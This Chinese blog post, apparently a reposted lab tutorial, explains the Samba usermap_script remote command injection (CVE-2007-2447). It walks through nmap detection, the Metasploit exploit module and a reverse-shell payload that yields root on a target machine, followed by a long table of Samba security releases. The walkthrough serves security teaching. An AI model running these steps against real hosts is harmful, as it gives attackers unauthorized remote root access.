国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁(yè)
  2. >Toy博客

4.9、漏洞利用 smb-RCE遠(yuǎn)程命令執(zhí)行

2年前作者:c10udy_分類(lèi):Toy博客閱讀(24)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了4.9、漏洞利用 smb-RCE遠(yuǎn)程命令執(zhí)行。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

目錄

1、samba服務(wù)介紹

2、漏洞相關(guān)信息

3、探測(cè)samba

4、metasploit利用

5、samba歷年漏洞

1、samba服務(wù)介紹

1.1 samba是在Linux和UNIX系統(tǒng)上實(shí)現(xiàn)SMB協(xié)議的一個(gè)免費(fèi)軟件,由服務(wù)器及客戶(hù)端程序構(gòu)成。

1.2 SMB(Server Messages Block,信息服務(wù)塊)是一種在局域網(wǎng)上共享文件和打印機(jī)的一種通信協(xié)議,它為局域網(wǎng)內(nèi)的不同計(jì)算機(jī)之間提供文件及打印機(jī)等資源的共享服務(wù)。SMB協(xié)議是客戶(hù)機(jī)/服務(wù)器(C/S)型協(xié)議,客戶(hù)機(jī)通過(guò)該協(xié)議可以訪(fǎng)問(wèn)服務(wù)器上的共享文件系統(tǒng)、打印機(jī)及其他資源。

1.3 samba監(jiān)聽(tīng)的端口
TCP:139、445。tcp 端口相對(duì)應(yīng)的服務(wù)是 smbd 服務(wù),其作用是提供對(duì)服務(wù)器中文件、打印資源的共享訪(fǎng)問(wèn)。
UDP:137、138。udp 端口相對(duì)應(yīng)的服務(wù)是 nmbd 服務(wù),其作用是提供基于 NetBIOS 主機(jī)名稱(chēng)的解析。

更多參考:Samba 服務(wù)詳解_公博義的博客-CSDN博客_samba

2、漏洞相關(guān)信息

2.1 關(guān)于Samba服務(wù)的usermap_script安全漏洞相關(guān)信息:
Username map script(用戶(hù)名映射腳本)是Samba協(xié)議的一個(gè)漏洞(CVE-2007-2447),始披露于2007年。屬于遠(yuǎn)程命令注入漏洞,主要影響Samba的3.0.20到3.0.25rc3 版本。

2.2 漏洞描述:

Samba在處理用戶(hù)數(shù)據(jù)時(shí)存在輸入驗(yàn)證漏洞,遠(yuǎn)程攻擊者可能利用此漏洞在服務(wù)器上執(zhí)行任意命令。Samba中負(fù)責(zé)在SAM數(shù)據(jù)庫(kù)更新用戶(hù)口令的代碼未經(jīng)過(guò)濾便將用戶(hù)輸入傳輸給了/bin/sh。如果在調(diào)用smb.conf中定義的外部腳本時(shí),通過(guò)對(duì)/bin/sh的MS-RPC調(diào)用提交了惡意輸入的話(huà),就可能允許攻擊者以nobody用戶(hù)的權(quán)限執(zhí)行任意命令。

相關(guān)參考:

阿里云漏洞庫(kù)文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-733584.html

https://www.cnvd.org.cn/flaw/show/CNVD-2007-3296

NVD - CVE-2007-2447

2.3 解決方案:

更新到高版本

3、探測(cè)samba

使用nmap探測(cè)

nmap -sV -p 139,445 ip

smb未授權(quán)訪(fǎng)問(wèn)漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),網(wǎng)絡(luò)安全

4、metasploit利用

使用metasploit內(nèi)集成的samba usermap RCE腳本:
exploit/multi/samba/usermap_script

use exploit/multi/samba/usermap_script

show options

set rhosts 192.168.106.132

smb未授權(quán)訪(fǎng)問(wèn)漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),網(wǎng)絡(luò)安全

smb未授權(quán)訪(fǎng)問(wèn)漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),網(wǎng)絡(luò)安全

?使用payload進(jìn)行攻擊

show payloads

set payload cmd/unix/reverse

show options

exploit

smb未授權(quán)訪(fǎng)問(wèn)漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),網(wǎng)絡(luò)安全smb未授權(quán)訪(fǎng)問(wèn)漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),網(wǎng)絡(luò)安全smb未授權(quán)訪(fǎng)問(wèn)漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),網(wǎng)絡(luò)安全smb未授權(quán)訪(fǎng)問(wèn)漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),網(wǎng)絡(luò)安全

?成功獲取靶機(jī)root權(quán)限,CTRL+C退出

5、samba歷年漏洞

參考 :

Samba - Security Updates and Information

阿里云漏洞庫(kù)

Samba安全發(fā)布
發(fā)布日期 下載 已知問(wèn)題 受影響的版本 CVE ID # 細(xì)節(jié)
25 October 2022 patch for Samba 4.17.2
patch for Samba 4.16.6
patch for Samba 4.15.11 		CVE-2022-3437 and CVE-2022-3592. Please see announcements for details. Please refer to the advisories. CVE-2022-3437, CVE-2022-3592. Announcement, Announcement.
27 July 2022 patch for Samba 4.16.4
patch for Samba 4.15.9
patch for Samba 4.14.14 		CVE-2022-2031, CVE-2022-32742, CVE-2022-32744, CVE-2022-32745 and CVE-2022-32746. Please see announcements for details. Please refer to the advisories. CVE-2022-2031, CVE-2022-32742, CVE-2022-32744, CVE-2022-32745, CVE-2022-32746. Announcement, Announcement, Announcement, Announcement, Announcement.
31 January 2022 patch for Samba 4.15.5
patch for Samba 4.14.12
patch for Samba 4.13.17 		CVE-2021-44141, CVE-2021-44142 and CVE-2022-0336. Please see announcements for details. Please refer to the advisories. CVE-2021-44141, CVE-2021-44142, CVE-2022-0336. Announcement, Announcement, Announcement.
10 January 2022 patch for Samba 4.13.16 Symlink race error can allow directory creation outside of the exported share. All versions of the Samba file server prior to 4.13.16 CVE-2021-43566. Announcement.
9 November 2021 patch for Samba 4.15.1
patch for Samba 4.14.9
patch for Samba 4.13.13 		CVE-2016-2124, CVE-2020-25717, CVE-2020-25718, CVE-2020-25719, CVE-2020-25721, CVE-2020-25722, CVE-2021-3738 and CVE-2021-23192. Please see announcements for details. Please refer to the advisories. CVE-2016-2124, CVE-2020-25717, CVE-2020-25718, CVE-2020-25719, CVE-2020-25721, CVE-2020-25722, CVE-2021-3738, CVE-2021-23192. Announcement, Announcement, Announcement, Announcement, Announcement, Announcement, Announcement, Announcement.
29 Apr 2021 patch for Samba 4.14.3
patch for Samba 4.13.7
patch for Samba 4.12.14 		Negative idmap cache entries can cause incorrect group entries in the Samba file server process token. All versions since 3.6.0. CVE-2021-20254 Announcement
24 Mar 2021 patch for Samba 4.14.0
patch for Samba 4.13.5
patch for Samba 4.12.12 		CVE-2020-27840 and CVE-2021-20277. Please see announcements for details. Please refer to the advisories. CVE-2020-27840, CVE-2021-20277. Announcement, Announcement.
29 Oct 2020 patch for Samba 4.13.0
patch for Samba 4.12.8
patch for Samba 4.11.14 		CVE-2020-14318, CVE-2020-14323 and CVE-2020-14383. Please see announcements for details. Please refer to the advisories. CVE-2020-14318, CVE-2020-14323 CVE-2020-14383. Announcement, Announcement, Announcement.
18 Sep 2020 patch for Samba 4.12.6
patch for Samba 4.11.12
patch for Samba 4.10.17 		CVE-2020-1472. Please see announcements for details. Please refer to the advisory. CVE-2020-1472. Announcement,
02 Jul 2020 patch for Samba 4.12.3
patch for Samba 4.11.10
patch for Samba 4.10.16 		CVE-2020-10730, CVE-2020-10745, CVE-2020-10760 and CVE-2020-14303. Please see announcements for details. Please refer to the advisories. CVE-2020-10730, CVE-2020-10745, CVE-2020-10760, CVE-2020-14303. Announcement, Announcement, Announcement, Announcement
28 Apr 2020 patch for Samba 4.12.1
patch for Samba 4.11.7
patch for Samba 4.10.14 		CVE-2020-10700 and CVE-2020-10704. Please see announcements for details. Please refer to the advisories. CVE-2020-10700, CVE-2020-10704. Announcement, Announcement
21 Jan 2020 patch for Samba 4.11.4
patch for Samba 4.10.11
patch for Samba 4.9.17 		CVE-2019-14902, CVE-2019-14907 and CVE-2019-19344. Please see announcements for details. Please refer to the advisories. CVE-2019-14902, CVE-2019-14907, CVE-2019-19344.. Announcement, Announcement, Announcement
10 Dec 2019 patch for Samba 4.11.2
patch for Samba 4.10.10
patch for Samba 4.9.16 		CVE-2019-14861 and CVE-2019-14870. Please see announcements for details. All versions since Samba 4.0 CVE-2019-14861, CVE-2019-14870. Announcement, Announcement
29 Oct 2019 patch for Samba 4.11.1
patch for Samba 4.10.9
patch for Samba 4.9.14 		CVE-2019-10218, CVE-2019-14833 and CVE-2019-14847. Please see announcements for details. please refer to the advisories CVE-2019-10218, CVE-2019-14833, CVE-2019-14847 Announcement, Announcement, Announcement
03 Sep 2019 patch for Samba 4.10.7
patch for Samba 4.9.12 		Combination of parameters and permissions can allow user to escape from the share path definition. All versions between Samba 4.9.0 and 4.9.12/4.10.7 (incl.). CVE-2019-10197 Announcement
19 Jun 2019 patch for Samba 4.10.4 (both CVEs)
patch for Samba 4.9.8 (CVE-2019-12435 only) 		CVE-2019-12435 and CVE-2019-12436. Please see the announcements for details. please refer to the advisories CVE-2019-12435, CVE-2019-12436 Announcement, Announcement
14 May 2019 patch for Samba 4.10.2
patch for Samba 4.9.7
patch for Samba 4.8.11 		CVE-2018-16860. Please see the announcements for details. All versions of Samba prior to 4.10.3, 4.9.8, 4.8.12. CVE-2018-16860 Announcement
08 Apr 2019 patch for Samba 4.10.1 (both CVEs)
patch for Samba 4.9.5 (both CVEs)
patch for Samba 4.8.10 (CVE-2019-3880 only) 		CVE-2019-3870 and CVE-2019-3880. Please see the announcements for details. please refer to the advisories CVE-2019-3870, CVE-2019-3880 Announcement, Announcement
27 Nov 2018 patch for Samba 4.9.2 (all CVEs)
patch for Samba 4.8.6 (all CVEs except CVE-2018-16852 and CVE-2018-16857)
patch for Samba 4.7.11 (all CVEs except CVE-2018-16852 and CVE-2018-16857) 		Numerous CVEs. Please see the announcements for details. please refer to the advisories CVE-2018-14629, CVE-2018-16841, CVE-2018-16851, CVE-2018-16852, CVE-2018-16853, CVE-2018-16857 Announcement, Announcement, Announcement, Announcement, Announcement, Announcement
14 Aug 2018 patch for Samba 4.8.3 (all CVEs)
patch for Samba 4.7.8 (all CVEs except CVE-2018-1140)
patch for Samba 4.6.15 (CVE-2018-10858 and CVE-2018-10919) 		Numerous CVEs. Please see the announcements for details. please refer to the advisories CVE-2018-10858, CVE-2018-10918, CVE-2018-10919, CVE-2018-1139, CVE-2018-1140 Announcement, Announcement, Announcement, Announcement, Announcement
13 Mar 2018 patch for Samba 4.7.5
patch for Samba 4.6.13
patch for Samba 4.5.15
patch for Samba 4.4.16 (only CVE-2018-1057)
patch for Samba 4.3.13 (only CVE-2018-1057) 		Numerous CVEs. Please see the announcements for details. please refer to the advisories CVE-2018-1050, CVE-2018-1057 Announcement, Announcement
21 Nov 2017 patch for Samba 4.7.2
patch for Samba 4.6.10
patch for Samba 4.5.14 		Numerous CVEs. Please see the announcements for details. please refer to the advisories CVE-2017-14746, CVE-2017-15275 Announcement, Announcement
20 Sep 2017 patch for Samba 4.6.7
patch for Samba 4.5.13
patch for Samba 4.4.15 		Numerous CVEs. Please see the announcements for details. please refer to the advisories CVE-2017-12150, CVE-2017-12151, CVE-2017-12163 Announcement, Announcement, Announcement
12 July 2017 patch for Samba 4.x.y Orpheus' Lyre mutual authentication validation bypass. All versions between Samba 4.0.0 and 4.6.6/4.5.12/4.4.15 CVE-2017-11103 Announcement
24 May 2017 patch for Samba 4.6.3, 4.5.9, 4.4.13 Remote code execution from a writable share. All versions between Samba 3.5.0 and 4.6.4/4.5.10/4.4.14 CVE-2017-7494 Announcement
23 Mar 2017 patch for Samba 4.6.0
patch for Samba 4.5.6
patch for Samba 4.4.11 		Symlink race allows access outside share definition. All versions of Samba prior to 4.6.1, 4.5.7, 4.4.12 CVE-2017-2619 Announcement
19 Dec 2016 patch for Samba 4.5.2
patch for Samba 4.4.7
patch for Samba 4.3.12 		Numerous CVEs. Please see the announcements for details. please refer to the advisories CVE-2016-2123, CVE-2016-2125, CVE-2016-2126 Announcement, Announcement, Announcement
07 Jul 2016 patch for Samba 4.4.4
patch for Samba 4.3.10
patch for Samba 4.2.13 		Client side SMB2/3 required signing can be downgraded. 4.0.0 - 4.4.4 CVE-2016-2119 Announcement
12 Apr 2016 patch for Samba 4.4.0
patch for Samba 4.3.6
patch for Samba 4.2.9
patch for Samba 4.0.26 (fileserver only! no client! no domain controller!)
patch for Samba 3.6.25 (only related CVEs) 		Numerous CVEs. Please see the announcements for details. please refer to the advisories CVE-2015-5370, CVE-2016-2110, CVE-2016-2111, CVE-2016-2112, CVE-2016-2113, CVE-2016-2114, CVE-2016-2115, CVE-2016-2118 Announcement Announcement Announcement Announcement Announcement Announcement Announcement Announcement
08 Mar 2016 patch for Samba 4.3.5
patch for Samba 4.2.8
patch for Samba 4.1.22 		Incorrect ACL get/set allowed on symlink path, Out-of-bounds read in internal DNS server. please refer to the advisories CVE-2015-7560, CVE-2016-0771, Announcement Announcement
16 Dec 2015 patch for Samba 4.3.2
patch for Samba 4.2.6
patch for Samba 4.1.21
patch for Samba 3.6.25 		Numerous CVEs. Please see the announcements for details. 3.0.0 to 4.3.2 CVE-2015-3223, CVE-2015-5252, CVE-2015-5296, CVE-2015-5299, CVE-2015-5330, CVE-2015-7540, CVE-2015-8467 Announcement Announcement Announcement Announcement Announcement Announcement Announcement
23 Feb 2015 patch for Samba 4.1.16
patch for Samba 4.0.24
patch for Samba 3.6.24
patch for Samba 3.5.22 		Unexpected code execution in smbd. 3.5.0 - 4.2.0rc4 CVE-2015-0240 Announcement
15 Jan 2015 patch for Samba 4.1.15
patch for Samba 4.0.23 		Elevation of privilege to Active Directory Domain Controller. 4.0.0 - 4.1.15 CVE-2014-8143 Announcement
01 Aug 2014 patch for Samba 4.1.10
patch for Samba 4.0.20 		Remote code execution in nmbd. 4.0.0 - 4.1.10 CVE-2014-3560 Announcement
23 Jun 2014 patch for Samba 4.1.8
patch for Samba 4.0.18
patch for Samba 3.6.23 		Denial of service - CPU loop, Denial of service - Server crash/memory corruption. please refer to the advisories CVE-2014-0244, CVE-2014-3493 Announcement Announcement
03 June 2014 patch for Samba 4.0.17
patch for Samba 4.1.7
patch for Samba 3.6.23 (CVE-2014-0178 only) 		Uninitialized memory exposure, Potential DOS in Samba internal DNS server. please refer to the advisories CVE-2014-0178, CVE-2014-0239 Announcement Announcement
11 Mar 2014 patch for Samba 4.1.5
patch for Samba 4.0.15
patch for Samba 3.6.22 		Password lockout not enforced for SAMR password changes, smbcacls can remove a file or directory ACL by mistake. please refer to the advisories CVE-2013-4496, CVE-2013-6442 Announcement Announcement
09 Dec 2013 patch for Samba 4.1.2
patch for Samba 4.0.12
patch for Samba 3.6.21
patch for Samba 3.5.22
patch for Samba 3.4.17 		DCE-RPC fragment length field is incorrectly checked, pam_winbind login without require_membership_of restrictions. please refer to the advisories CVE-2013-4408, CVE-2012-6150 Announcement Announcement
11 Nov 2013 patch for Samba 4.1.0
patch for Samba 4.0.10
patch for Samba 3.6.19 		ACLs are not checked on opening an alternate data stream on a file or directory, Private key in key.pem world readable. 3.2.0 - 4.1.0, 4.0.0 - 4.0.10, 4.1.0 CVE-2013-4475, CVE-2013-4476 Announcement Announcement
05 Aug 2013 patch for Samba 4.0.7
patch for Samba 3.6.16
patch for Samba 3.5.21 		Denial of service - CPU loop and memory allocation. 3.0.x-4.0.7 CVE-2013-4124 Announcement
02 Apr 2013 patch for Samba 3.6.5 A writable configured share might get read only 3.6.0 - 3.6.5 (inclusive) CVE-2013-0454 Announcement
19 Mar 2013 patch for Samba 4.0.3 World-writeable files may be created in additional shares on a Samba 4.0 AD DC. 4.0.0rc6-4.0.3 CVE-2013-1863 Announcement
30 Jan 2013 patch for Samba 4.0.1
patch for Samba 3.6.11
patch for Samba 3.5.20 		Clickjacking issue and potential XSRF in SWAT. 3.0.x-4.0.1 CVE-2013-0213, CVE-2013-0214 Announcement Announcement
15 Jan 2013 patch for Samba 4.0.0 Samba 4.0 as an AD DC may provide authenticated users with write access to LDAP directory objects. 4.0.0 CVE-2013-0172 Announcement
30 Apr 2012 patch for Samba 3.4.16
patch for Samba 3.5.14
patch for Samba 3.6.4 		Incorrect permission checks when granting/removing privileges can compromise file server security. 3.4.x-3.6.4 CVE-2012-2111 Announcement
10 Apr 2012 patch for Samba 3.0.37
patch for Samba 3.2.15
patch for Samba 3.3.16
patch for Samba 3.4.15
patch for Samba 3.5.13
patch for Samba 3.6.3 		"root" credential remote code execution all current releases CVE-2012-1182 Announcement
23 Feb 2012 patch for Samba 3.0
patch for Samba 3.2
patch for Samba 3.3 		Remote code execution vulnerability in smbd pre-3.4 CVE-2012-0870 Announcement
29 Jan 2012 patch for Samba 3.6.2 Memory leak/Denial of service 3.6.0-3.6.2 CVE-2012-0817 Announcement
26 Jul 2011 patch for Samba 3.3.15
patch for Samba 3.4.13
patch for Samba 3.5.9 		Cross-Site Request Forgery in SWAT all current releases CVE-2011-2522 Announcement
26 Jul 2011 patch for Samba 3.3.15
patch for Samba 3.4.13
patch for Samba 3.5.9 		Cross-Site Scripting vulnerability in SWAT all current releases CVE-2011-2694 Announcement
18 Feb 2011 patch for Samba 3.3.14
patch for Samba 3.4.11
patch for Samba 3.5.6 		Denial of service - memory corruption all current releases CVE-2011-0719 Announcement
14 Sep 2010 patch for Samba 3.3.13
patch for Samba 3.4.8
patch for Samba 3.5.4 		Buffer Overrun Vulnerability all current releases CVE-2010-3069 Announcement
16 Jun 2010 patch for Samba 3.3.12 and 3.2.15
patch for Samba 3.0.37 		Memory Corruption Vulnerability 3.0.x, 3.2.x, 3.3.0-3.3.12 CVE-2010-2063 Announcement
08 Mar 2010 patch for Samba 3.5.0
patch for Samba 3.4.6
patch for Samba 3.3.11 		Permission ignored 3.3.11, 3.4.6, 3.5.0 CVE-2010-0728 Announcement
02 Feb 2010 not available Change parameter "wide links" to default to "no" pre-3.4.6 CVE-2010-0926 Announcement
01 Oct 2009 patch 1 for Samba 3.4.1 ?patch 2 for Samba 3.4.1 ?patch 1 for Samba 3.3.7 ?patch 2 for Samba 3.3.7 ?patch 1 for Samba 3.2.14 ?patch 2 for Samba 3.2.14 ?patch 1 for Samba 3.0.36 ?patch 2 for Samba 3.0.36 Information disclosure by setuid mount.cifs all releases CVE-2009-2948 Announcement
01 Oct 2009 patch for Samba 3.4.1
patch for Samba 3.3.7
patch for Samba 3.2.14
patch for Samba 3.0.36 		Remote DoS against smbd on authenticated connections all releases CVE-2009-2906 Announcement
01 Oct 2009 patch for Samba 3.4.1
patch for Samba 3.3.7
patch for Samba 3.2.14
patch for Samba 3.0.36 		Misconfigured /etc/passwd file may share folders unexpectedly > 3.0.11 CVE-2009-2813 Announcement
23 Jun 2009 patch for Samba 3.3.5
patch for Samba 3.2.12
patch for Samba 3.0.34 		Uninitialized read of a data value Samba 3.0.31 - 3.3.5 CVE-2009-1888 Announcement
23 Jun 2009 patch for Samba 3.2.12 Formatstring vulnerability in smbclient Samba 3.2.0 - 3.2.12 CVE-2009-1886 Announcement
05 Jan 2009 patch for Samba 3.2.6 Potential access to "/" in setups with registry shares enabled Samba 3.2.0 - 3.2.6 CVE-2009-0022 Announcement
27 Nov 2008 patch for Samba 3.0.32 ?patch for Samba 3.2.4 Potential leak of arbitrary memory contents Samba 3.0.29 - 3.2.4 CVE-2008-4314 Announcement
27 Aug 2008 patch 1 for Samba 3.2.2 ?patch 2 for Samba 3.2.2 Wrong permissions of group_mapping.ldb Samba 3.2.0 - 3.2.2 CVE-2008-3789 Announcement
29 May 2008 patch for Samba 3.0.29 Boundary failure when parsing SMB responses Samba 3.0.0 - 3.0.29 CVE-2008-1105 Announcement
10 Dec 2007 patch for Samba 3.0.27a Remote Code Execution in Samba's nmbd (send_mailslot()) Samba 3.0.0 - 3.0.27a CVE-2007-6015 Announcement
15 Nov 2007 patch for Samba 3.0.26a Remote Code Execution in Samba's nmbd Samba 3.0.0 - 3.0.26a CVE-2007-5398 Announcement
15 Nov 2007 patch for Samba 3.0.26a GETDC mailslot processing buffer overrun in nmbd Samba 3.0.0 - 3.0.26a CVE-2007-4572 Announcement
11 Sep 2007 patch for Samba 3.0.25 Incorrect primary group assignment for users using the rfc2307 or sfu nss info plugin. Samba 3.0.25 - 3.0.25c CVE-2007-4138 Announcement
14 May 2007 patch for Samba 3.0.24 Remote Command Injection Vulnerability (Updated June 5 to include missing "c" character from INCLUDE list). Samba 3.0.0 - 3.0.25rc3 CVE-2007-2447 Announcement
14 May 2007 patch for Samba 3.0.24 Multiple Heap Overflows Allow Remote Code Execution (Updated May 25 to fix regression in Samba domain controller logon code). Samba 3.0.0 - 3.0.25rc3 CVE-2007-2446 Announcement
14 May 2007 patch for Samba 3.0.24 Local SID/Name translation bug can result in user privilege elevation (Updated May 25 to fix regression in the "force group" parameter). Samba 3.0.23d - 3.0.25pre2 CVE-2007-2444 Announcement
5 Feb 2007 patch for Samba 3.0.23d Potential Denial of Service bug in smbd Samba 3.0.6 - 3.0.23d CVE-2007-0452 Announcement
5 Feb 2007 patch for Samba 3.0.23d Buffer overrun in NSS host lookup Winbind library on Solaris Samba 3.0.21 - 3.0.23d CVE-2007-0453 Announcement
5 Feb 2007 patch for Samba 3.0.23d Format string bug in afsacl.so VFS plugin Samba 3.0.6 - 3.0.23d CVE-2007-0454 Announcement
10 July 2006 patch for Samba 3.0.1 - 3.0.22 Memory exhaustion DoS against smbd Samba 3.0.1 - 3.0.22 CVE-2006-3403 Announcement
30 March 2006 patch for Samba 3.0.21[a-c] Exposure of machine account credentials in winbind log files Samba 3.0.21 - 3.0.21c CVE-2006-1059 Announcement
16 December 2004 patch for Samba 3.0.9 Integer Overflow in security descriptor parsing Samba 2.x, 3.0.x <= 3.0.9 CVE-2004-1154 Announcement
15 November 2004 patch for <=Samba 3.0.7 Buffer Overrun in smbd Samba 3.0.x <= 3.0.7 CVE-2004-0882 Announcement
8 November 2004 patch for <=Samba 3.0.7 Remote DoS Samba 3.0.x <= 3.0.7 CVE-2004-0930 Announcement
30 September 2004 Samba 2.2.12 and/or patch for <=Samba 3.0.2a Potential arbitrary file access Samba 2.2.x <=2.2.11 and Samba 3.0.x <=3.0.2a CVE-2004-0815 Announcement
13 Sept 2004 3.0.5 patch Two DoS bugs; one affecting smbd, the other nmbd. 3.0.x <= 3.0.6 CVE-2004-0807, CVE-2004-0808 Announcement
22 Jul 2004 3.0.5 Two potential buffer overruns >=3.0.2 CVE-2004-0600, CVE-2004-0686 CVE-2004-0600 Announcement CVE-2004-0686 Announcement
22 Jul 2004 2.2.10 Buffer overrun in hash mangling method all 2.2 releases CVE-2004-0686 release notes
9 Feb 2004 3.0.2a Password initialization bug that could grant an attacker unauthorized access to a user account created by the mksmbpasswd.sh shell script. >=3.0.0 CVE-2004-0082 Announcement
7 Apr 2003 2.2.8a Buffer overrun condition in the SMB/CIFS packet fragment re-assembly code. all 2.0 releases and <= 2.2.8 CVE-2003-0196, CVE-2003-0201 release notes
10 Dec 2002 2.2.7a Bug in the length checking for encrypted password change requests from clients. 2.2.2 - 2.2.6 CVE-2003-0085 release notes
23 Jun 2001 2.2.0a Bug in expansion of certain smb.conf variables such as %m that could grant an attacker the capability to overwrite arbitrary files on the server. Bug that causes smbd not to honor the hosts allow and deny smb.conf directives. 2.2.0 release notes
23 Jun 2001 2.0.10 Bug in the handling of temporary files that allows local users to destroy data on local devices. >= 2.0.0 release notes

到了這里,關(guān)于4.9、漏洞利用 smb-RCE遠(yuǎn)程命令執(zhí)行的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶(hù)投稿,該文觀(guān)點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • CVE-2020-14882 weblogic未授權(quán)遠(yuǎn)程命令執(zhí)行漏洞

    CVE-2020-14882 weblogic未授權(quán)遠(yuǎn)程命令執(zhí)行漏洞

    一、漏洞描述 Oracle WebLogic Server 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2020-14882)POC 被公開(kāi),未經(jīng)身份驗(yàn)證)的遠(yuǎn)程攻擊者可通過(guò)構(gòu)造特殊的 HTTP GET 請(qǐng)求,結(jié)合 CVE-2020-14883 漏洞進(jìn)行利用,利用此漏洞可在未經(jīng)身份驗(yàn)證的情況下直接接管 WebLogic Server Console ,并執(zhí)行任意代碼,利用門(mén)檻低,危

    2024年02月16日
    瀏覽(16)
  • RCE 遠(yuǎn)程代碼執(zhí)行漏洞分析

    RCE 遠(yuǎn)程代碼執(zhí)行漏洞分析

    Remote Command/Code Execute 遠(yuǎn)程命令執(zhí)行/遠(yuǎn)程代碼執(zhí)行漏洞 這種漏洞通常出現(xiàn)在應(yīng)用程序或操作系統(tǒng)中,攻擊者可以通過(guò)利用漏洞注入惡意代碼,并在受攻擊的系統(tǒng)上執(zhí)行任意命令。 PHP 代碼執(zhí)行 PHP 代碼注入 OS 命令執(zhí)行 OS 命令注入 Java、Python…… Web 應(yīng)用程序 遠(yuǎn)程服務(wù) 操作系統(tǒng)

    2024年02月08日
    瀏覽(30)
  • SMB服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2020-0796)加固指南

    SMB服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2020-0796)加固指南

    漏洞信息 序號(hào) 漏洞類(lèi)型 風(fēng)險(xiǎn)等級(jí) 漏洞主機(jī)( 操作系統(tǒng)及版本) 1 SMB 服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2020-0796) 高 Windows 漏洞加固實(shí)施 漏洞1:SMB服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2020-0796) 漏洞詳細(xì) 2020年3月11日,某國(guó)外安全公司發(fā)布了一個(gè)近期微軟安全補(bǔ)丁包所涉及漏洞的綜述,其中談

    2024年02月07日
    瀏覽(23)
  • RCE代碼執(zhí)行漏和命令執(zhí)行漏洞

    RCE代碼執(zhí)行漏和命令執(zhí)行漏洞

    前置知識(shí): 漏洞檢測(cè): 在了解漏洞概念前,應(yīng)該先知道一下這個(gè)漏洞如何檢測(cè)的,我們應(yīng)該或多或少聽(tīng)過(guò)白盒測(cè)試(白盒),黑盒測(cè)試(黑盒)。 白盒測(cè)試: 白盒測(cè)試是對(duì)源代碼和內(nèi)部結(jié)構(gòu)的測(cè)試,測(cè)試人員是可以知道內(nèi)部的邏輯和結(jié)構(gòu)的,差不多就是代碼審計(jì)。 黑盒測(cè)試:

    2024年02月19日
    瀏覽(30)
  • H2db console 未授權(quán)訪(fǎng)問(wèn)RCE 漏洞復(fù)現(xiàn)+利用(CVE-2022-23221)

    H2db console 未授權(quán)訪(fǎng)問(wèn)RCE 漏洞復(fù)現(xiàn)+利用(CVE-2022-23221)

    H2是Thomas Mueller提供的一個(gè)開(kāi)源的、純java實(shí)現(xiàn)的關(guān)系數(shù)據(jù)庫(kù)。H2的主要特點(diǎn)是:非???,開(kāi)源,JDBC API;嵌入式和服務(wù)器模式;內(nèi)存數(shù)據(jù)庫(kù);基于瀏覽器的控制臺(tái)應(yīng)用程序。 H2 數(shù)據(jù)庫(kù)控制臺(tái)中的另一個(gè)未經(jīng)身份驗(yàn)證的 RCE 漏洞,在 v2.1.210+ 中修復(fù)。2.1.210 之前的 H2 控制臺(tái)允許遠(yuǎn)

    2024年02月14日
    瀏覽(23)
  • RCE代碼及命令執(zhí)行漏洞全解(30)

    RCE代碼及命令執(zhí)行漏洞全解(30)

    ?web應(yīng)用中,有時(shí)候程序員為了考慮靈活性,簡(jiǎn)潔性,會(huì)在代碼中調(diào)用代碼或執(zhí)行命令執(zhí)行函數(shù)去處理。 比如當(dāng)應(yīng)用在調(diào)用一些能將字符串轉(zhuǎn)化成代碼的函數(shù)時(shí),沒(méi)有考慮用戶(hù)是否能夠控制這些字符串,將代碼執(zhí)行漏洞,同樣調(diào)用系統(tǒng)命令處理,將造成命令執(zhí)行漏洞。 ?危害

    2024年02月07日
    瀏覽(20)
  • Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)

    Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)

    框架介紹: ThinkPHP是一款運(yùn)用極廣的PHP開(kāi)發(fā)框架。 漏洞引入: 其5.0.23以前的版本中,獲取method的方法中沒(méi)有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類(lèi)任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。 1、訪(fǎng)問(wèn)靶機(jī)地址+端口號(hào) 進(jìn)入首頁(yè) 2、Burp抓包修改傳參方式為Po

    2024年02月06日
    瀏覽(26)
  • YApi分析從NoSQL注入到RCE遠(yuǎn)程命令執(zhí)行.md

    YApi分析從NoSQL注入到RCE遠(yuǎn)程命令執(zhí)行.md

